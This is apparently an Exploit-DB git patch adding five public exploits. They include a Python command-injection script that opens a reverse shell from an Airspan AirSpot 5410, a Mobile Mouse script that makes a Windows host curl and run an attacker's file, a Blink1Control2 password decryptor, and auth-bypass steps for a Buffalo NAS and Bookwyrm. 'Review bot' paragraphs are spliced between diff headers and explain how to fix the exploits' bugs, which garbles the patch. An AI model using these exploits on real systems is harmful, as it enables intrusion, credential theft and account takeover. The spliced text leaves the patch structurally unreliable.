From 7cbe771564cfd29cbc140607647ebc26b3aefa83 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 21 Sep 2022 05:01:54 +0000
Subject: [PATCH] DB: 2022-09-21

5 changes to exploits/shellcodes

Blink1Control2 2.2.7 - Weak Password Encryption
Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)
Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)
Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass
Bookwyrm v0.4.3 - Authentication Bypass
---
 exploits/hardware/webapps/51012.txt | 91 +++++++++++++++++++++++++++++
 exploits/linux/remote/51011.py | 79 +++++++++++++++++++++++++
 exploits/multiple/local/51014.js | 67 +++++++++++++++++++++
 exploits/multiple/webapps/51013.txt | 18 ++++++
 exploits/windows/remote/51010.py | 66 +++++++++++++++++++++
 files_exploits.csv | 5 ++
 6 files changed, 326 insertions(+)
 create mode 100644 exploits/hardware/webapps/51012.txt
 create mode 100755 exploits/linux/remote/51011.py
 create mode 100644 exploits/multiple/local/51014.js
 create mode 100644 exploits/multiple/webapps/51013.txt
 create mode 100755 exploits/windows/remote/51010.py

diff --git a/exploits/hardware/webapps/51012.txt b/exploits/hardware/webapps/51012.txt
new file mode 100644
index 000000000..da58442b6
--- /dev/null
+++ b/exploits/hardware/webapps/51012.txt
@@ -0,0 +1,91 @@
+# Exploit Title: Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass
+# Date: 2022-08-11
+# Exploit Author: JORDAN GLOVER
+# Type: WEBAPPS
+# Platform: HARDWARE
+# Vendor Homepage: https://www.buffalotech.com/
+# Model: TeraStation Series
+# Firmware Version: 1.66
+# Tested on: Windows 10
+
+
+An authentication bypass vulnerability found within the web interface of a Buffalo TeraStation Series Network Attached Storage (NAS) device, allows an unauthenticated malicious actor to gain administrative privileges.
+
+The web interface can be accessed via port 80 or 443 via a web browser. Once accessed you will be presented with a login page, that requires a username and password to gain authentication to the NAS.
+
+Using a proxy tool to intercept the request and responses, it was possible re-intercept the response and modify the JSON data, contained within the body.
+
+If you modify the "success" to 'true' and change "Pagemode" to '0', this will grant you authentication with administrator privileges, to the NAS.
+
+
+POC #1 Authentication Failure
+
+Request
+POST /dynamic.pl HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/static/index.html
+
+bufaction=verifyLogin&user=Jordan&password=Jordan
+
+
+Response
+HTTP/1.1 200 OK
+Content-type: text/html
+Pragma: no-cache
+Cache-Control: no-store, no-cache, must-revalidate
+Cache-Control: post-check=0, pre-check=0
+Expires: Thu, 01 Dec 1994 16:00:00 GMT
+Connection: close
+Date: Mon, 30 Jun 2008 02:39:51 GMT
+Server: lighttpd/1.4.32
+Content-Length: 94
+
+{"success":false,"errors":[],"data":[{"sid":"zz69c1c4d83023374d0b786d7a5y69b0","pageMode":2}]}
+
+Incorrect Username or Password
+
+
+
+POC #2 Authentication Success
+
+Request
+POST /dynamic.pl HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/static/index.html
+
+bufaction=verifyLogin&user=Jordan&password=Jordan
+
+
+Intercepted Response
+HTTP/1.1 200 OK
+Content-type: text/html
+Pragma: no-cache
+Cache-Control: no-store, no-cache, must-revalidate
+Cache-Control: post-check=0, pre-check=0
+Expires: Thu, 01 Dec 1994 16:00:00 GMT
+Connection: close
+Date: Mon, 30 Jun 2008 02:39:51 GMT
+Server: lighttpd/1.4.32
+Content-Length: 94
+
+{"success":true,"errors":[],"data":[{"sid":"ag69c5f4x43093374d0c786k7a9y59h0","pageMode":0}]}
+
+Login Successful
\ No newline at end of file
diff --git a/exploits/linux/remote/51011.py b/exploits/linux/remote/51011.py
new file mode 100755
index 000000000..87f3ca137
--- /dev/null
+++ b/exploits/linux/remote/51011.py
@@ -0,0 +1,79 @@
+# Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)
+# Date: 7/26/2022
+# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
+# Vendor Homepage: https://www.airspan.com/
+# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
+# Version: 0.3.4.1-4 and under.
+# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
+# CVE : CVE-2022-36267
+
+from __future__ import print_function, unicode_literals
+import argparse
+import requests
+import urllib3
+urllib3.disable_warnings()
+
+def banner():
+ airspanLogo = """
+ ,-.
+ / \ `. __..-,O
+ : \ --''_..-'.'
+ | . .-' `. '.
+ : . .`.'
+ \ `. / ..
+ \ `. ' .
+ `, `. \
+ ,|,`. `-.\
+ '.|| ``-...__..-`
+ | | Airspan
+ |__| AirSpot 5410
+ /||\ PWNED x_x
+ //||\\
+ // || \\
+ __//__||__\\__
+'--------------'Necrum Security Labs
+
+\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m
+ FOR EDUCATIONAL PURPOSE ONLY.
+ """
+ return print('\033[1;94m{}\033[1;m'.format(airspanLogo))
+
+def pingWebInterface(RHOST, RPORT):
+ url = 'https://{}:{}'.format(RHOST, RPORT)
+ try:
+ response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
+ if response.status_code != 200:
+ print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
+ exit()
+ print('[INFO] Airspan device web interface seems reachable!')
+ except:
+ print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
+ exit()
+
+
+def execReverseShell(RHOST, RPORT, LHOST, LPORT):
+ payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
+ data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
+ try:
+ print('[INFO] Executing reverse shell...')
+ response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
+ print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
+ return
+ except Exception as e:
+ print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
+ return False
+
+def main():
+ banner()
+ args = parser.parse_args()
+ pingWebInterface(args.RHOST, args.RPORT)
+ execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
+
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
+ parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
+ parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
+ parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
+ parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/local/51014.js b/exploits/multiple/local/51014.js
new file mode 100644
index 000000000..c1caf4440
--- /dev/null
+++ b/exploits/multiple/local/51014.js
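Review bot: In execReverseShell's `except` branch, `.format(LHOST, LPORT)` is applied to the result of `print(...)`, which is None, so the failure path raises AttributeError and hides the original exception bound to `e` (which is otherwise unused); the line should read `print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}".format(LHOST, LPORT))`. In pingWebInterface the bare `except:` also catches the SystemExit raised by the `exit()` in the non-200 branch, so the "not reachable" message is printed twice before the process exits; `except requests.RequestException:` covers what the `requests.get` call can actually raise. `response` in execReverseShell is assigned but never read, and `main` relies on the module-global `parser` that is only bound under the `__main__` guard, so importing the module and calling `main()` fails with NameError.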
@@ -0,0 +1,67 @@
+// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption
+// Date: 2022-08-12
+// Exploit Author: p1ckzi
+// Vendor Homepage: https://thingm.com/
+// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7
+// Vulnerable Version: blink1control2 <= 2.2.7
+// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.
+// CVE: CVE-2022-35513
+//
+// Description:
+// the blink1control2 app (versions <= 2.2.7) utilises an insecure method
+// of password storage which can be found by accessing the /blink1/input url
+// of the api server.
+// password ciphertext for skype logins and email are listed
+// and can be decrypted. example usage:
+// node blink1-pass-decrypt
+#!/usr/bin/env node
+const {ArgumentParser} = require('argparse');
+const simpleCrypt = require('simplecrypt');
+
+function exploit() {
+ const BANNER = '\033[36m\n\
+ _ _ _ _ _\n\
+ | |__ | (_)_ __ | | _/ | _ __ __ _ ___ ___\n\
+ | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\
+ | |_) | | | | | | <| |_____| |_) | (_| \\__ \\__ |_____|\n\
+ |_.__/|_|_|_| |_|_|\\_|_| | .__/ \\__,_|___|___/\n\
+ |_|\n\
+ _ _\n\
+ __| | ___ ___ _ __ _ _ _ __ | |_\n\
+ / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\
+ | (_| | __| (__| | | |_| | |_) | |_\n\
+ \\__,_|\\___|\\___|_| \\__, | .__/ \\__|\n\
+ |___/|_|\033[39m';
+
+ const PARSER = new ArgumentParser({
+ description: 'decrypts passwords found at the /blink/input url ' +
+ 'of the blink1control2 api server (version <= 2.2.7 ).'
+ });
+ PARSER.add_argument('ciphertext', {
+ help: 'encrypted password string to use', type: 'str'
+ });
+ let args = PARSER.parse_args();
+
+ // supplied ciphertext is decrypted with same salt, password, and method
+ // used for encryption:
+ try {
+ let crypt = simpleCrypt({
+ salt: 'boopdeeboop',
+ password: 'blink1control',
+ method: 'aes-192-ecb'
+ });
+ let ciphertext = args.ciphertext;
+ let decrypted = crypt.decrypt(ciphertext);
+ console.log(BANNER);
+ console.log('\033[32m[+] decrypted password:\033[39m');
+ console.log(decrypted);
+ }
+ catch (TypeError) {
+ console.log('\033[33m[!] the submitted hash was invalid.\033[39m');
+ }
+ finally {
+ process.exit(1);
+ }
+}
+
+exploit()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51013.txt b/exploits/multiple/webapps/51013.txt
new file mode 100644
index 000000000..a78dc28da
--- /dev/null
+++ b/exploits/multiple/webapps/51013.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Bookwyrm v0.4.3 - Authentication Bypass
+# Date: 2022-08-4
+# Exploit Author: Akshay Ravi
+# Vendor Homepage: https://github.com/bookwyrm-social/bookwyrm
+# Software Link: https://github.com/bookwyrm-social/bookwyrm/releases/tag/v0.4.3
+# Version: <= 4.0.3
+# Tested on: MacOS Monterey
+# CVE: CVE-2022-2651
+# Original Report Link: https://huntr.dev/bounties/428eee94-f1a0-45d0-9e25-318641115550/
+
+Description: Email Verification Bypass Leads To Account Takeover in bookwyrm-social/bookwyrm v0.4.3 Due To Lack Of Ratelimit Protection
+
+# Steps to reproduce:
+
+1. Create a acount with victims email id
+2. When the account is created, its ask for email confirmation via validating OTP
+Endpoint: https://site/confirm-email
+3. Enter any random OTP and try to perfrom bruteforce attack and if otp matches, We can takeover that account
\ No newline at end of file
diff --git a/exploits/windows/remote/51010.py b/exploits/windows/remote/51010.py
new file mode 100755
index 000000000..ba1bb7470
--- /dev/null
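Review bot: `catch (TypeError)` does not filter by exception type — in JavaScript the parenthesised name is just the binding for whatever was thrown, so it shadows the global `TypeError` and every error raised inside the `try` is reported as "the submitted hash was invalid". The `finally { process.exit(1); }` then terminates with a failure status even when the decrypt succeeded, so a caller cannot tell the two outcomes apart; `catch (err) {` with the `process.exit(1)` moved into the catch block and the `finally` removed keeps the success path at exit code 0. The `#!/usr/bin/env node` on file line 17 is inert because a shebang is only honoured on the first line of a file; the same applies to the `#!/usr/bin/env python3` placed after the comment header in exploits/windows/remote/51010.py.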
+++ b/exploits/windows/remote/51010.py
@@ -0,0 +1,66 @@
+# Exploit Title: Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)
+# Date: Aug 09, 2022
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://mobilemouse.com/
+# Software Link: https://www.mobilemouse.com/downloads/setup.exe
+# Version: 3.6.0.4
+# Tested on: Windows 10 Enterprise LTSC Build 17763
+
+#!/usr/bin/env python3
+
+import socket
+from time import sleep
+import argparse
+
+help = " Mobile Mouse 3.6.0.4 Remote Code Execution "
+parser = argparse.ArgumentParser(description=help)
+parser.add_argument("--target", help="Target IP", required=True)
+parser.add_argument("--file", help="File name to Upload")
+parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")
+
+args = parser.parse_args()
+
+host = args.target
+command_shell = args.file
+lhost = args.lhost
+port = 9099 # Default Port
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, port))
+
+CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
+s.send(CONN)
+run = s.recv(54)
+
+RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
+s.send(RUN)
+run = s.recv(54)
+
+sleep(0.5)
+
+download_string= f"curl http://{lhost}:8080/{command_shell} -o
+c:\Windows\Temp\{command_shell}".encode('utf-8')
+hex_shell = download_string.hex()
+SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" +
+"4b45591e2d311e454e5445521e04")
+s.send(SHELL)
+shell = s.recv(96)
+
+print ("Executing The Command Shell...")
+
+sleep(1.2)
+RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404")
+s.send(RUN2)
+run2 = s.recv(54)
+
+shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
+hex_run = shell_string.hex()
+RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" +
+"4b45591e2d311e454e5445521e04")
+s.send(RUN3)
+run3 = s.recv(96)
+
+print (" Take The Rose")
+
+sleep(10)
+s.close()
\ No newline at end of file
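Review bot: The f-string assigned to `download_string` is broken across two physical lines — the first ends at `-o` and the next begins `c:\Windows\Temp\{command_shell}".encode('utf-8')` — with no enclosing parentheses or backslash continuation, so the file fails to compile with an unterminated string literal before any socket is opened; the two halves belong on one line (the `bytearray.fromhex(... +` continuations are fine because they sit inside parentheses). The same literal and `shell_string` embed `\W` and `\T`, which are invalid escape sequences that CPython flags with a warning, and the backslash directly before `{command_shell}` is likewise not a valid escape; a raw prefix or doubled backslashes would make the intended path explicit. `--file` is not `required=True`, so a run without it silently formats the literal `None` into the path, and `help` shadows the builtin of the same name.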
diff --git a/files_exploits.csv b/files_exploits.csv
index dd1547ed4..a65117062 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11492,6 +11492,7 @@ id,file,description,date,author,type,platform,port
 50975,exploits/windows/local/50975.txt,"Kite 1.2021.610.0 - Unquoted Service Path",1970-01-01,"Ghaleb Al-otaibi",local,windows,
 50977,exploits/windows/local/50977.txt,"Dr. Fone 4.0.8 - 'net_updater32.exe' Unquoted Service Path",1970-01-01,Esant1490,local,windows,
 50985,exploits/windows/local/50985.txt,"Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path",1970-01-01,"Angelo Pio Amirante",local,windows,
+51014,exploits/multiple/local/51014.js,"Blink1Control2 2.2.7 - Weak Password Encryption",1970-01-01,p1ckzi,local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18722,6 +18723,8 @@ id,file,description,date,author,type,platform,port
 50999,exploits/windows/remote/50999.py,"Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)",1970-01-01,r00tpgp,remote,windows,
 51000,exploits/linux/remote/51000.txt,"uftpd 2.10 - Directory Traversal (Authenticated)",1970-01-01,"Aaron Esau",remote,linux,
 51005,exploits/multiple/remote/51005.py,"PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,UnD3sc0n0c1d0,remote,multiple,
+51010,exploits/windows/remote/51010.py,"Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)",1970-01-01,"Chokri Hammedi",remote,windows,
+51011,exploits/linux/remote/51011.py,"Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)",1970-01-01,"Samy Younsi",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45071,3 +45074,5 @@ id,file,description,date,author,type,platform,port
 51007,exploits/php/webapps/51007.txt,"WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,
 51008,exploits/php/webapps/51008.txt,"WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,
 51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",1970-01-01,samguy,webapps,multiple,
+51012,exploits/hardware/webapps/51012.txt,"Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass",1970-01-01,"Jordan Glover",webapps,hardware,
+51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",1970-01-01,"Akshay Ravi",webapps,multiple,